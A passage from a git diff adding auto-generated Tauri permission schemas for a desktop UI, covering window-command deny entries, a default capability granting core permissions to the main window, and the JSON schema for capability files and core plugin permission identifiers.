scope.","commands":{"allow":[],"deny":["minimize"]}},"deny-monitor-from-point":{"identifier":"deny-monitor-from-point","description":"Denies the monitor_from_point command without any pre-configured scope.","commands":{"allow":[],"deny":["monitor_from_point"]}},"deny-outer-position":{"identifier":"deny-outer-position","description":"Denies the outer_position command without any pre-configured scope.","commands":{"allow":[],"deny":["outer_position"]}},"deny-outer-size":{"identifier":"deny-outer-size","description":"Denies the outer_size command without any pre-configured scope.","commands":{"allow":[],"deny":["outer_size"]}},"deny-primary-monitor":{"identifier":"deny-primary-monitor","description":"Denies the primary_monitor command without any pre-configured scope.","commands":{"allow":[],"deny":["primary_monitor"]}},"deny-request-user-attention":{"identifier":"deny-request-user-attention","description":"Denies the request_user_attention command without any pre-configured scope.","commands":{"allow":[],"deny":["request_user_attention"]}},"deny-scale-factor":{"identifier":"deny-scale-factor","description":"Denies the scale_factor command without any pre-configured scope.","commands":{"allow":[],"deny":["scale_factor"]}},"deny-scene-identifier":{"identifier":"deny-scene-identifier","description":"Denies the scene_identifier command without any pre-configured scope.","commands":{"allow":[],"deny":["scene_identifier"]}},"deny-set-always-on-bottom":{"identifier":"deny-set-always-on-bottom","description":"Denies the set_always_on_bottom command without any pre-configured scope.","commands":{"allow":[],"deny":["set_always_on_bottom"]}},"deny-set-always-on-top":{"identifier":"deny-set-always-on-top","description":"Denies the set_always_on_top command without any pre-configured scope.","commands":{"allow":[],"deny":["set_always_on_top"]}},"deny-set-background-color":{"identifier":"deny-set-background-color","description":"Denies the set_background_color command without any pre-configured scope.","commands":{"allow":[],"deny":["set_background_color"]}},"deny-set-badge-count":{"identifier":"deny-set-badge-count","description":"Denies the set_badge_count command without any pre-configured scope.","commands":{"allow":[],"deny":["set_badge_count"]}},"deny-set-badge-label":{"identifier":"deny-set-badge-label","description":"Denies the set_badge_label command without any pre-configured scope.","commands":{"allow":[],"deny":["set_badge_label"]}},"deny-set-closable":{"identifier":"deny-set-closable","description":"Denies the set_closable command without any pre-configured scope.","commands":{"allow":[],"deny":["set_closable"]}},"deny-set-content-protected":{"identifier":"deny-set-content-protected","description":"Denies the set_content_protected command without any pre-configured scope.","commands":{"allow":[],"deny":["set_content_protected"]}},"deny-set-cursor-grab":{"identifier":"deny-set-cursor-grab","description":"Denies the set_cursor_grab command without any pre-configured scope.","commands":{"allow":[],"deny":["set_cursor_grab"]}},"deny-set-cursor-icon":{"identifier":"deny-set-cursor-icon","description":"Denies the set_cursor_icon command without any pre-configured scope.","commands":{"allow":[],"deny":["set_cursor_icon"]}},"deny-set-cursor-position":{"identifier":"deny-set-cursor-position","description":"Denies the set_cursor_position command without any pre-configured scope.","commands":{"allow":[],"deny":["set_cursor_position"]}},"deny-set-cursor-visible":{"identifier":"deny-set-cursor-visible","description":"Denies the set_cursor_visible command without any pre-configured scope.","commands":{"allow":[],"deny":["set_cursor_visible"]}},"deny-set-decorations":{"identifier":"deny-set-decorations","description":"Denies the set_decorations command without any pre-configured scope.","commands":{"allow":[],"deny":["set_decorations"]}},"deny-set-effects":{"identifier":"deny-set-effects","description":"Denies the set_effects command without any pre-configured scope.","commands":{"allow":[],"deny":["set_effects"]}},"deny-set-enabled":{"identifier":"deny-set-enabled","description":"Denies the set_enabled command without any pre-configured scope.","commands":{"allow":[],"deny":["set_enabled"]}},"deny-set-focus":{"identifier":"deny-set-focus","description":"Denies the set_focus command without any pre-configured scope.","commands":{"allow":[],"deny":["set_focus"]}},"deny-set-focusable":{"identifier":"deny-set-focusable","description":"Denies the set_focusable command without any pre-configured scope.","commands":{"allow":[],"deny":["set_focusable"]}},"deny-set-fullscreen":{"identifier":"deny-set-fullscreen","description":"Denies the set_fullscreen command without any pre-configured scope.","commands":{"allow":[],"deny":["set_fullscreen"]}},"deny-set-icon":{"identifier":"deny-set-icon","description":"Denies the set_icon command without any pre-configured scope.","commands":{"allow":[],"deny":["set_icon"]}},"deny-set-ignore-cursor-events":{"identifier":"deny-set-ignore-cursor-events","description":"Denies the set_ignore_cursor_events command without any pre-configured scope.","commands":{"allow":[],"deny":["set_ignore_cursor_events"]}},"deny-set-max-size":{"identifier":"deny-set-max-size","description":"Denies the set_max_size command without any pre-configured scope.","commands":{"allow":[],"deny":["set_max_size"]}},"deny-set-maximizable":{"identifier":"deny-set-maximizable","description":"Denies the set_maximizable command without any pre-configured scope.","commands":{"allow":[],"deny":["set_maximizable"]}},"deny-set-min-size":{"identifier":"deny-set-min-size","description":"Denies the set_min_size command without any pre-configured scope.","commands":{"allow":[],"deny":["set_min_size"]}},"deny-set-minimizable":{"identifier":"deny-set-minimizable","description":"Denies the set_minimizable command without any pre-configured scope.","commands":{"allow":[],"deny":["set_minimizable"]}},"deny-set-overlay-icon":{"identifier":"deny-set-overlay-icon","description":"Denies the set_overlay_icon command without any pre-configured scope.","commands":{"allow":[],"deny":["set_overlay_icon"]}},"deny-set-position":{"identifier":"deny-set-position","description":"Denies the set_position command without any pre-configured scope.","commands":{"allow":[],"deny":["set_position"]}},"deny-set-progress-bar":{"identifier":"deny-set-progress-bar","description":"Denies the set_progress_bar command without any pre-configured scope.","commands":{"allow":[],"deny":["set_progress_bar"]}},"deny-set-resizable":{"identifier":"deny-set-resizable","description":"Denies the set_resizable command without any pre-configured scope.","commands":{"allow":[],"deny":["set_resizable"]}},"deny-set-shadow":{"identifier":"deny-set-shadow","description":"Denies the set_shadow command without any pre-configured scope.","commands":{"allow":[],"deny":["set_shadow"]}},"deny-set-simple-fullscreen":{"identifier":"deny-set-simple-fullscreen","description":"Denies the set_simple_fullscreen command without any pre-configured scope.","commands":{"allow":[],"deny":["set_simple_fullscreen"]}},"deny-set-size":{"identifier":"deny-set-size","description":"Denies the set_size command without any pre-configured scope.","commands":{"allow":[],"deny":["set_size"]}},"deny-set-size-constraints":{"identifier":"deny-set-size-constraints","description":"Denies the set_size_constraints command without any pre-configured scope.","commands":{"allow":[],"deny":["set_size_constraints"]}},"deny-set-skip-taskbar":{"identifier":"deny-set-skip-taskbar","description":"Denies the set_skip_taskbar command without any pre-configured scope.","commands":{"allow":[],"deny":["set_skip_taskbar"]}},"deny-set-theme":{"identifier":"deny-set-theme","description":"Denies the set_theme command without any pre-configured scope.","commands":{"allow":[],"deny":["set_theme"]}},"deny-set-title":{"identifier":"deny-set-title","description":"Denies the set_title command without any pre-configured scope.","commands":{"allow":[],"deny":["set_title"]}},"deny-set-title-bar-style":{"identifier":"deny-set-title-bar-style","description":"Denies the set_title_bar_style command without any pre-configured scope.","commands":{"allow":[],"deny":["set_title_bar_style"]}},"deny-set-visible-on-all-workspaces":{"identifier":"deny-set-visible-on-all-workspaces","description":"Denies the set_visible_on_all_workspaces command without any pre-configured scope.","commands":{"allow":[],"deny":["set_visible_on_all_workspaces"]}},"deny-show":{"identifier":"deny-show","description":"Denies the show command without any pre-configured scope.","commands":{"allow":[],"deny":["show"]}},"deny-start-dragging":{"identifier":"deny-start-dragging","description":"Denies the start_dragging command without any pre-configured scope.","commands":{"allow":[],"deny":["start_dragging"]}},"deny-start-resize-dragging":{"identifier":"deny-start-resize-dragging","description":"Denies the start_resize_dragging command without any pre-configured scope.","commands":{"allow":[],"deny":["start_resize_dragging"]}},"deny-theme":{"identifier":"deny-theme","description":"Denies the theme command without any pre-configured scope.","commands":{"allow":[],"deny":["theme"]}},"deny-title":{"identifier":"deny-title","description":"Denies the title command without any pre-configured scope.","commands":{"allow":[],"deny":["title"]}},"deny-toggle-maximize":{"identifier":"deny-toggle-maximize","description":"Denies the toggle_maximize command without any pre-configured scope.","commands":{"allow":[],"deny":["toggle_maximize"]}},"deny-unmaximize":{"identifier":"deny-unmaximize","description":"Denies the unmaximize command without any pre-configured scope.","commands":{"allow":[],"deny":["unmaximize"]}},"deny-unminimize":{"identifier":"deny-unminimize","description":"Denies the unminimize command without any pre-configured scope.","commands":{"allow":[],"deny":["unminimize"]}}},"permission_sets":{},"global_scope_schema":null}} \ No newline at end of file diff --git a/ui/src-tauri/gen/schemas/capabilities.json b/ui/src-tauri/gen/schemas/capabilities.json new file mode 100644 index 0000000..1addd2f --- /dev/null +++ b/ui/src-tauri/gen/schemas/capabilities.json @@ -0,0 +1 @@ +{"default":{"identifier":"default","description":"Default capability — grants core permissions to the main window","local":true,"windows":["main"],"permissions":["core:default"]}} \ No newline at end of file diff --git a/ui/src-tauri/gen/schemas/desktop-schema.json b/ui/src-tauri/gen/schemas/desktop-schema.json new file mode 100644 index 0000000..3286645 --- /dev/null +++ b/ui/src-tauri/gen/schemas/desktop-schema.json @@ -0,0 +1,2292 @@ +{ + "$schema": "http://json-schema.org/draft-07/schema#", + "title": "CapabilityFile", + "description": "Capability formats accepted in a capability file.", + "anyOf": [ + { + "description": "A single capability.", + "allOf": [ + { + "$ref": "#/definitions/Capability" + } + ] + }, + { + "description": "A list of capabilities.", + "type": "array", + "items": { + "$ref": "#/definitions/Capability" + } + }, + { + "description": "A list of capabilities.", + "type": "object", + "required": [ + "capabilities" + ], + "properties": { + "capabilities": { + "description": "The list of capabilities.", + "type": "array", + "items": { + "$ref": "#/definitions/Capability" + } + } + } + } + ], + "definitions": { + "Capability": { + "description": "A grouping and boundary mechanism developers can use to isolate access to the IPC layer.\n\nIt controls application windows' and webviews' fine grained access to the Tauri core, application, or plugin commands. If a webview or its window is not matching any capability then it has no access to the IPC layer at all.\n\nThis can be done to create groups of windows, based on their required system access, which can reduce impact of frontend vulnerabilities in less privileged windows. Windows can be added to a capability by exact name (e.g. `main-window`) or glob patterns like `*` or `admin-*`. A Window can have none, one, or multiple associated capabilities.\n\n## Example\n\n```json { \"identifier\": \"main-user-files-write\", \"description\": \"This capability allows the `main` window on macOS and Windows access to `filesystem` write related commands and `dialog` commands to enable programmatic access to files selected by the user.\", \"windows\": [ \"main\" ], \"permissions\": [ \"core:default\", \"dialog:open\", { \"identifier\": \"fs:allow-write-text-file\", \"allow\": [{ \"path\": \"$HOME/test.txt\" }] }, ], \"platforms\": [\"macOS\",\"windows\"] } ```", + "type": "object", + "required": [ + "identifier", + "permissions" + ], + "properties": { + "identifier": { + "description": "Identifier of the capability.\n\n## Example\n\n`main-user-files-write`", + "type": "string" + }, + "description": { + "description": "Description of what the capability is intended to allow on associated windows.\n\nIt should contain a description of what the grouped permissions should allow.\n\n## Example\n\nThis capability allows the `main` window access to `filesystem` write related commands and `dialog` commands to enable programmatic access to files selected by the user.", + "default": "", + "type": "string" + }, + "remote": { + "description": "Configure remote URLs that can use the capability permissions.\n\nThis setting is optional and defaults to not being set, as our default use case is that the content is served from our local application.\n\n:::caution Make sure you understand the security implications of providing remote sources with local system access. :::\n\n## Example\n\n```json { \"urls\": [\"https://*.mydomain.dev\"] } ```", + "anyOf": [ + { + "$ref": "#/definitions/CapabilityRemote" + }, + { + "type": "null" + } + ] + }, + "local": { + "description": "Whether this capability is enabled for local app URLs or not. Defaults to `true`.", + "default": true, + "type": "boolean" + }, + "windows": { + "description": "List of windows that are affected by this capability. Can be a glob pattern.\n\nIf a window label matches any of the patterns in this list, the capability will be enabled on all the webviews of that window, regardless of the value of [`Self::webviews`].\n\nOn multiwebview windows, prefer specifying [`Self::webviews`] and omitting [`Self::windows`] for a fine grained access control.\n\n## Example\n\n`[\"main\"]`", + "type": "array", + "items": { + "type": "string" + } + }, + "webviews": { + "description": "List of webviews that are affected by this capability. Can be a glob pattern.\n\nThe capability will be enabled on all the webviews whose label matches any of the patterns in this list, regardless of whether the webview's window label matches a pattern in [`Self::windows`].\n\n## Example\n\n`[\"sub-webview-one\", \"sub-webview-two\"]`", + "type": "array", + "items": { + "type": "string" + } + }, + "permissions": { + "description": "List of permissions attached to this capability.\n\nMust include the plugin name as prefix in the form of `${plugin-name}:${permission-name}`. For commands directly implemented in the application itself only `${permission-name}` is required.\n\n## Example\n\n```json [ \"core:default\", \"shell:allow-open\", \"dialog:open\", { \"identifier\": \"fs:allow-write-text-file\", \"allow\": [{ \"path\": \"$HOME/test.txt\" }] } ] ```", + "type": "array", + "items": { + "$ref": "#/definitions/PermissionEntry" + }, + "uniqueItems": true + }, + "platforms": { + "description": "Limit which target platforms this capability applies to.\n\nBy default all platforms are targeted.\n\n## Example\n\n`[\"macOS\",\"windows\"]`", + "type": [ + "array", + "null" + ], + "items": { + "$ref": "#/definitions/Target" + } + } + } + }, + "CapabilityRemote": { + "description": "Configuration for remote URLs that are associated with the capability.", + "type": "object", + "required": [ + "urls" + ], + "properties": { + "urls": { + "description": "Remote domains this capability refers to using the [URLPattern standard](https://urlpattern.spec.whatwg.org/).\n\n## Examples\n\n- \"https://*.mydomain.dev\": allows subdomains of mydomain.dev - \"https://mydomain.dev/api/*\": allows any subpath of mydomain.dev/api", + "type": "array", + "items": { + "type": "string" + } + } + } + }, + "PermissionEntry": { + "description": "An entry for a permission value in a [`Capability`] can be either a raw permission [`Identifier`] or an object that references a permission and extends its scope.", + "anyOf": [ + { + "description": "Reference a permission or permission set by identifier.", + "allOf": [ + { + "$ref": "#/definitions/Identifier" + } + ] + }, + { + "description": "Reference a permission or permission set by identifier and extends its scope.", + "type": "object", + "allOf": [ + { + "properties": { + "identifier": { + "description": "Identifier of the permission or permission set.", + "allOf": [ + { + "$ref": "#/definitions/Identifier" + } + ] + }, + "allow": { + "description": "Data that defines what is allowed by the scope.", + "type": [ + "array", + "null" + ], + "items": { + "$ref": "#/definitions/Value" + } + }, + "deny": { + "description": "Data that defines what is denied by the scope. This should be prioritized by validation logic.", + "type": [ + "array", + "null" + ], + "items": { + "$ref": "#/definitions/Value" + } + } + } + } + ], + "required": [ + "identifier" + ] + } + ] + }, + "Identifier": { + "description": "Permission identifier", + "oneOf": [ + { + "description": "Default core plugins set.\n#### This default permission set includes:\n\n- `core:path:default`\n- `core:event:default`\n- `core:window:default`\n- `core:webview:default`\n- `core:app:default`\n- `core:image:default`\n- `core:resources:default`\n- `core:menu:default`\n- `core:tray:default`", + "type": "string", + "const": "core:default", + "markdownDescription": "Default core plugins set.\n#### This default permission set includes:\n\n- `core:path:default`\n- `core:event:default`\n- `core:window:default`\n- `core:webview:default`\n- `core:app:default`\n- `core:image:default`\n- `core:resources:default`\n- `core:menu:default`\n- `core:tray:default`" + }, + { + "description": "Default permissions for the plugin.\n#### This default permission set includes:\n\n- `allow-version`\n- `allow-name`\n- `allow-tauri-version`\n- `allow-identifier`\n- `allow-bundle-type`\n- `allow-register-listener`\n- `allow-remove-listener`\n- `allow-supports-multiple-windows`", + "type": "string", + "const": "core:app:default", + "markdownDescription": "Default permissions for the plugin.\n#### This default permission set includes:\n\n- `allow-version`\n- `allow-name`\n- `allow-tauri-version`\n- `allow-identifier`\n- `allow-bundle-type`\n- `allow-register-listener`\n- `allow-remove-listener`\n- `allow-supports-multiple-windows`" + }, + { + "description": "Enables the app_hide command without any pre-configured scope.", + "type": "string", + "const": "core:app:allow-app-hide", + "markdownDescription": "Enables the app_hide command without any pre-configured scope." + }, + { + "description": "Enables the app_show command without any pre-configured scope.", + "type": "string", + "const": "core:app:allow-app-show", + "markdownDescription": "Enables the app_show command without any pre-configured scope." + }, + { + "description": "Enables the bundle_type command without any pre-configured scope.", + "type": "string", + "const": "core:app:allow-bundle-type", + "markdownDescription": "Enables the bundle_type command without any pre-configured scope." + }, + { + "description": "Enables the default_window_icon command without any pre-configured scope.", + "type": "string", + "const": "core:app:allow-default-window-icon", + "markdownDescription": "Enables the default_window_icon command without any pre-configured scope." + }, + { + "description": "Enables the fetch_data_store_identifiers command without any pre-configured scope.", + "type": "string", + "const": "core:app:allow-fetch-data-store-identifiers", + "markdownDescription": "Enables the fetch_data_store_identifiers command without any pre-configured scope." + }, + { + "description": "Enables the identifier command without any pre-configured scope.", + "type": "string", + "const": "core:app:allow-identifier", + "markdownDescription": "Enables the identifier command without any pre-configured scope." + }, + { + "description": "Enables the name command without any pre-configured scope.", + "type": "string", + "const": "core:app:allow-name", + "markdownDescription": "Enables the name command without any pre-configured scope." + }, + { + "description": "Enables the register_listener command without any pre-configured scope.", + "type": "string", + "const": "core:app:allow-register-listener", + "markdownDescription": "Enables the register_listener command without any pre-configured scope." + }, + { + "description": "Enables the remove_data_store command without any pre-configured scope.", + "type": "string", + "const": "core:app:allow-remove-data-store", + "markdownDescription": "Enables the remove_data_store command without any pre-configured scope." + }, + { + "description": "Enables the remove_listener command without any pre-configured scope.", + "type": "string", + "const": "core:app:allow-remove-listener", + "markdownDescription": "Enables the remove_listener command without any pre-configured scope." + }, + { + "description": "Enables the set_app_theme command without any pre-configured scope.", + "type": "string", + "const": "core:app:allow-set-app-theme", + "markdownDescription": "Enables the set_app_theme command without any pre-configured scope." + }, + { + "description": "Enables the set_dock_visibility command without any pre-configured scope.", + "type": "string", + "const": "core:app:allow-set-dock-visibility", + "markdownDescription": "Enables the set_dock_visibility command without any pre-configured scope." + }, + { + "description": "Enables the supports_multiple_windows command without any pre-configured scope.", + "type": "string", + "const": "core:app:allow-supports-multiple-windows", + "markdownDescription": "Enables the supports_multiple_windows command without any pre-configured scope." + }, + { + "description": "Enables the tauri_version command without any pre-configured scope.", + "type": "string", + "const": "core:app:allow-tauri-version", + "markdownDescription": "Enables the tauri_version command without any pre-configured scope." + }, + { + "description": "Enables the version command without any pre-configured scope.", + "type": "string", + "const": "core:app:allow-version", + "markdownDescription": "Enables the version command without any pre-configured scope." + }, + { + "description": "Denies the app_hide command without any pre-configured scope.", + "type": "string", + "const": "core:app:deny-app-hide", + "markdownDescription": "Denies the app_hide command without any pre-configured scope." + }, + { + "description": "Denies the app_show command without any pre-configured scope.", + "type": "string", + "const": "core:app:deny-app-show", + "markdownDescription": "Denies the app_show command without any pre-configured scope." + }, + { + "description": "Denies the bundle_type command without any pre-configured scope.", + "type": "string", + "const": "core:app:deny-bundle-type", + "markdownDescription": "Denies the bundle_type command without any pre-configured scope." + }, + { + "description": "Denies the default_window_icon command without any pre-configured scope.", + "type": "string", + "const": "core:app:deny-default-window-icon", + "markdownDescription": "Denies the default_window_icon command without any pre-configured scope." + }, + { + "description": "Denies the fetch_data_store_identifiers command without any pre-configured scope.", + "type": "string", + "const": "core:app:deny-fetch-data-store-identifiers", + "markdownDescription": "Denies the fetch_data_store_identifiers command without any pre-configured scope." + }, + { + "description": "Denies the identifier command without any pre-configured scope.", + "type": "string", + "const": "core:app:deny-identifier", + "markdownDescription": "Denies the identifier command without any pre-configured scope." + }, + { + "description": "Denies the name command without any pre-configured scope.", + "type": "string", + "const": "core:app:deny-name", + "markdownDescription": "Denies the name command without any pre-configured scope." + }, + { + "description": "Denies the register_listener command without any pre-configured scope.", + "type": "string", + "const": "core:app:deny-register-listener", + "markdownDescription": "Denies the register_listener command without any pre-configured scope." + }, + { + "description": "Denies the remove_data_store command without any pre-configured scope.", + "type": "string", + "const": "core:app:deny-remove-data-store", + "markdownDescription": "Denies the remove_data_store command without any pre-configured scope." + }, + { + "description": "Denies the remove_listener command without any pre-configured scope.", + "type": "string", + "const": "core:app:deny-remove-listener", + "markdownDescription": "Denies the remove_listener command without any pre-configured scope." + }, + { + "description": "Denies the set_app_theme command without any pre-configured scope.", + "type": "string", + "const": "core:app:deny-set-app-theme", + "markdownDescription": "Denies the set_app_theme command without any pre-configured scope." + }, + { + "description": "Denies the set_dock_visibility command without any pre-configured scope.", + "type": "string", + "const": "core:app:deny-set-dock-visibility", + "markdownDescription": "Denies the set_dock_visibility command without any pre-configured scope." + }, + { + "description": "Denies the supports_multiple_windows command without any pre-configured scope.", + "type": "string", + "const": "core:app:deny-supports-multiple-windows", + "markdownDescription": "Denies the supports_multiple_windows command without any pre-configured scope." + }, + { + "description": "Denies the tauri_version command without any pre-configured scope.", + "type": "string", + "const": "core:app:deny-tauri-version", + "markdownDescription": "Denies the tauri_version command without any pre-configured scope." + }, + { + "description": "Denies the version command without any pre-configured scope.", + "type": "string", + "const": "core:app:deny-version", + "markdownDescription": "Denies the version command without any pre-configured scope." + }, + { + "description": "Default permissions for the plugin, which enables all commands.\n#### This default permission set includes:\n\n- `allow-listen`\n- `allow-unlisten`\n- `allow-emit`\n- `allow-emit-to`", + "type": "string", + "const": "core:event:default", + "markdownDescription": "Default permissions for the plugin, which enables all commands.\n#### This default permission set includes:\n\n- `allow-listen`\n- `allow-unlisten`\n- `allow-emit`\n- `allow-emit-to`" + }, + { + "description": "Enables the emit command without any pre-configured scope.", + "type": "string", + "const": "core:event:allow-emit", + "markdownDescription": "Enables the emit command without any pre-configured scope." + }, + { + "description": "Enables the emit_to command without any pre-configured scope.", + "type": "string", + "const": "core:event:allow-emit-to", + "markdownDescription": "Enables the emit_to command without any pre-configured scope." + }, + { + "description": "Enables the listen command without any pre-configured scope.", + "type": "string", + "const": "core:event:allow-listen", + "markdownDescription": "Enables the listen command without any pre-configured scope." + }, + { + "description": "Enables the unlisten command without any pre-configured scope.", + "type": "string", + "const": "core:event:allow-unlisten", + "markdownDescription": "Enables the unlisten command without any pre-configured scope." + }, + { + "description": "Denies the emit command without any pre-configured scope.", + "type": "string", + "const": "core:event:deny-emit", + "markdownDescription": "Denies the emit command without any pre-configured scope." + }, + { + "description": "Denies the emit_to command without any pre-configured scope.", + "type": "string", + "const": "core:event:deny-emit-to", + "markdownDescription": "Denies the emit_to command without any pre-configured scope." + }, + { + "description": "Denies the listen command without any pre-configured scope.", + "type": "string", + "const": "core:event:deny-listen", + "markdownDescription": "Denies the listen command without any pre-configured scope." + }, + { + "description": "Denies the unlisten command without any pre-configured scope.", + "type": "string", + "const": "core:event:deny-unlisten", + "markdownDescription": "Denies the unlisten command without any pre-configured scope." + }, + { + "description": "Default permissions for the plugin, which enables all commands.\n#### This default permission set includes:\n\n- `allow-new`\n- `allow-from-bytes`\n- `allow-from-path`\n- `allow-rgba`\n- `allow-size`", + "type": "string", + "const": "core:image:default", + "markdownDescription": "Default permissions for the plugin, which enables all commands.\n#### This default permission set includes:\n\n- `allow-new`\n- `allow-from-bytes`\n- `allow-from-path`\n- `allow-rgba`\n- `allow-size`" + }, + { + "description": "Enables the from_bytes command without any pre-configured scope.", + "type": "string", + "const": "core:image:allow-from-bytes", + "markdownDescription": "Enables the from_bytes command without any pre-configured scope." + }, + { + "description": "Enables the from_path command without any pre-configured scope.", + "type": "string", + "const": "core:image:allow-from-path", + "markdownDescription": "Enables the from_path command without any pre-configured scope." + }, + { + "description": "Enables the new command without any pre-configured scope.", + "type": "string", + "const": "core:image:allow-new", + "markdownDescription": "Enables the new command without any pre-configured scope." + }, + { + "description": "Enables the rgba command without any pre-configured scope.", + "type": "string", + "const": "core:image:allow-rgba", + "markdownDescription": "Enables the rgba command without any pre-configured scope." + }, + { + "description": "Enables the size command without any pre-configured scope.", + "type": "string", + "const": "core:image:allow-size", + "markdownDescription": "Enables the size command without any pre-configured scope." + }, + { + "description": "Denies the from_bytes command without any pre-configured scope.", + "type": "string", + "const": "core:image:deny-from-bytes", + "markdownDescription": "Denies the from_bytes command without any pre-configured scope." + }, + { + "description": "Denies the from_path command without any pre-configured scope.", + "type": "string", + "const": "core:image:deny-from-path", + "markdownDescription": "Denies the from_path command without any pre-configured scope." + }, + { + "description": "Denies the new command without any pre-configured scope.", + "type": "string", + "const": "core:image:deny-new", + "markdownDescription": "Denies the new command without any pre-configured scope." + }, + { + "description": "Denies the rgba command without any pre-configured scope.", + "type": "string", + "const": "core:image:deny-rgba", + "markdownDescription": "Denies the rgba command without any pre-configured scope." + }, + { + "description": "Denies the size command without any pre-configured scope.", + "type": "string", + "const": "core:image:deny-size", + "markdownDescription": "Denies the size command without any pre-configured scope." + }, + { + "description": "Default permissions for the plugin, which enables all commands.\n#### This default permission set includes:\n\n- `allow-new`\n- `allow-append`\n- `allow-prepend`\n- `allow-insert`\n- `allow-remove`\n- `allow-remove-at`\n- `allow-items`\n- `allow-get`\n- `allow-popup`\n- `allow-create-default`\n- `allow-set-as-app-menu`\n- `allow-set-as-window-menu`\n- `allow-text`\n- `allow-set-text`\n- `allow-is-enabled`\n- `allow-set-enabled`\n- `allow-set-accelerator`\n- `allow-set-as-windows-menu-for-nsapp`\n- `allow-set-as-help-menu-for-nsapp`\n- `allow-is-checked`\n- `allow-set-checked`\n- `allow-set-icon`", + "type": "string", + "const": "core:menu:default", + "markdownDescription": "Default permissions for the plugin, which enables all commands.\n#### This default permission set includes:\n\n- `allow-new`\n- `allow-append`\n- `allow-prepend`\n- `allow-insert`\n- `allow-remove`\n- `allow-remove-at`\n- `allow-items`\n- `allow-get`\n- `allow-popup`\n- `allow-create-default`\n- `allow-set-as-app-menu`\n- `allow-set-as-window-menu`\n- `allow-text`\n- `allow-set-text`\n- `allow-is-enabled`\n- `allow-set-enabled`\n- `allow-set-accelerator`\n- `allow-set-as-windows-menu-for-nsapp`\n- `allow-set-as-help-menu-for-nsapp`\n- `allow-is-checked`\n- `allow-set-checked`\n- `allow-set-icon`" + }, + { + "description": "Enables the append command without any pre-configured scope.", + "type": "string", + "const": "core:menu:allow-append", + "markdownDescription": "Enables the append command without any pre-configured scope." + }, + { + "description": "Enables the create_default command without any pre-configured scope.", + "type": "string", + "const": "core:menu:allow-create-default", + "markdownDescription": "Enables the create_default command without any pre-configured scope." + }, + { + "description": "Enables the get command without any pre-configured scope.", + "type": "string", + "const": "core:menu:allow-get", + "markdownDescription": "Enables the get command without any pre-configured scope." + }, + { + "description": "Enables the insert command without any pre-configured scope.", + "type": "string", + "const": "core:menu:allow-insert", + "markdownDescription": "Enables the insert command without any pre-configured scope." + }, + { + "description": "Enables the is_checked command without any pre-configured scope.", + "type": "string", + "const": "core:menu:allow-is-checked", + "markdownDescription": "Enables the is_checked command without any pre-configured scope." + }, + { + "description": "Enables the is_enabled command without any pre-configured scope.", + "type": "string", + "const": "core:menu:allow-is-enabled", + "markdownDescription": "Enables the is_enabled command without any pre-configured scope." + }, + { + "description": "Enables the items command without any pre-configured scope.", + "type": "string", + "const": "core:menu:allow-items", + "markdownDescription": "Enables the items command without any pre-configured scope." + }, + { + "description": "Enables the new command without any pre-configured scope.", + "type": "string", + "const": "core:menu:allow-new", + "markdownDescription": "Enables the new command without any pre-configured scope." + }, + { + "description": "Enables the popup command without any pre-configured scope.", + "type": "string", + "const": "core:menu:allow-popup", + "markdownDescription": "Enables the popup command without any pre-configured scope." + }, + { + "description": "Enables the prepend command without any pre-configured scope.", + "type": "string", + "const": "core:menu:allow-prepend", + "markdownDescription": "Enables the prepend command without any pre-configured scope." + }, + { + "description": "Enables the remove command without any pre-configured scope.", + "type": "string", + "const": "core:menu:allow-remove", + "markdownDescription": "Enables the remove command without any pre-configured scope." + }, + { + "description": "Enables the remove_at command without any pre-configured scope.", + "type": "string", + "const": "core:menu:allow-remove-at", + "markdownDescription": "Enables the remove_at command without any pre-configured scope." + }, + { + "description": "Enables the set_accelerator command without any pre-configured scope.", + "type": "string", + "const": "core:menu:allow-set-accelerator", + "markdownDescription": "Enables the set_accelerator command without any pre-configured scope." + }, + { + "description": "Enables the set_as_app_menu command without any pre-configured scope.", + "type": "string", + "const": "core:menu:allow-set-as-app-menu", + "markdownDescription": "Enables the set_as_app_menu command without any pre-configured scope." + }, + { + "description": "Enables the set_as_help_menu_for_nsapp command without any pre-configured scope.", + "type": "string", + "const": "core:menu:allow-set-as-help-menu-for-nsapp", + "markdownDescription": "Enables the set_as_help_menu_for_nsapp command without any pre-configured scope." + }, + { + "description": "Enables the set_as_window_menu command without any pre-configured scope.", + "type": "string", + "const": "core:menu:allow-set-as-window-menu", + "markdownDescription": "Enables the set_as_window_menu command without any pre-configured scope." + }, + { + "description": "Enables the set_as_windows_menu_for_nsapp command without any pre-configured scope.", + "type": "string", + "const": "core:menu:allow-set-as-windows-menu-for-nsapp", + "markdownDescription": "Enables the set_as_windows_menu_for_nsapp command without any pre-configured scope." + }, + { + "description": "Enables the set_checked command without any pre-configured scope.", + "type": "string", + "const": "core:menu:allow-set-checked", + "markdownDescription": "Enables the set_checked command without any pre-configured scope." + }, + { + "description": "Enables the set_enabled command without any pre-configured scope.", + "type": "string", + "const": "core:menu:allow-set-enabled", + "markdownDescription": "Enables the set_enabled command without any pre-configured scope." + }, + { + "description": "Enables the set_icon command without any pre-configured scope.", + "type": "string", + "const": "core:menu:allow-set-icon", + "markdownDescription": "Enables the set_icon command without any pre-configured scope." + }, + { + "description": "Enables the set_text command without any pre-configured scope.", + "type": "string", + "const": "core:menu:allow-set-text", + "markdownDescription": "Enables the set_text command without any pre-configured scope." + }, + { + "description": "Enables the text command without any pre-configured scope.", + "type": "string", + "const": "core:menu:allow-text", + "markdownDescription": "Enables the text command without any pre-configured scope." + }, + { + "description": "Denies the append command without any pre-configured scope.", + "type": "string", + "const": "core:menu:deny-append", + "markdownDescription": "Denies the append command without any pre-configured scope." + }, + { + "description": "Denies the create_default command without any pre-configured scope.", + "type": "string", + "const": "core:menu:deny-create-default", + "markdownDescription": "Denies the create_default command without any pre-configured scope." + }, + { + "description": "Denies the get command without any pre-configured scope.", + "type": "string", + "const": "core:menu:deny-get", + "markdownDescription": "Denies the get command without any pre-configured scope." + }, + { + "description": "Denies the insert command without any pre-configured scope.", + "type": "string", + "const": "core:menu:deny-insert", + "markdownDescription": "Denies the insert command without any pre-configured scope." + }, + { + "description": "Denies the is_checked command without any pre-configured scope.", + "type": "string", + "const": "core:menu:deny-is-checked", + "markdownDescription": "Denies the is_checked command without any pre-configured scope." + }, + { + "description": "Denies the is_enabled command without any pre-configured scope.", + "type": "string", + "const": "core:menu:deny-is-enabled", + "markdownDescription": "Denies the is_enabled command without any pre-configured scope." + }, + { + "description": "Denies the items command without any pre-configured scope.", + "type": "string", + "const": "core:menu:deny-items", + "markdownDescription": "Denies the items command without any pre-configured scope." + }, + { + "description": "Denies the new command without any pre-configured scope.", + "type": "string", + "const": "core:menu:deny-new", + 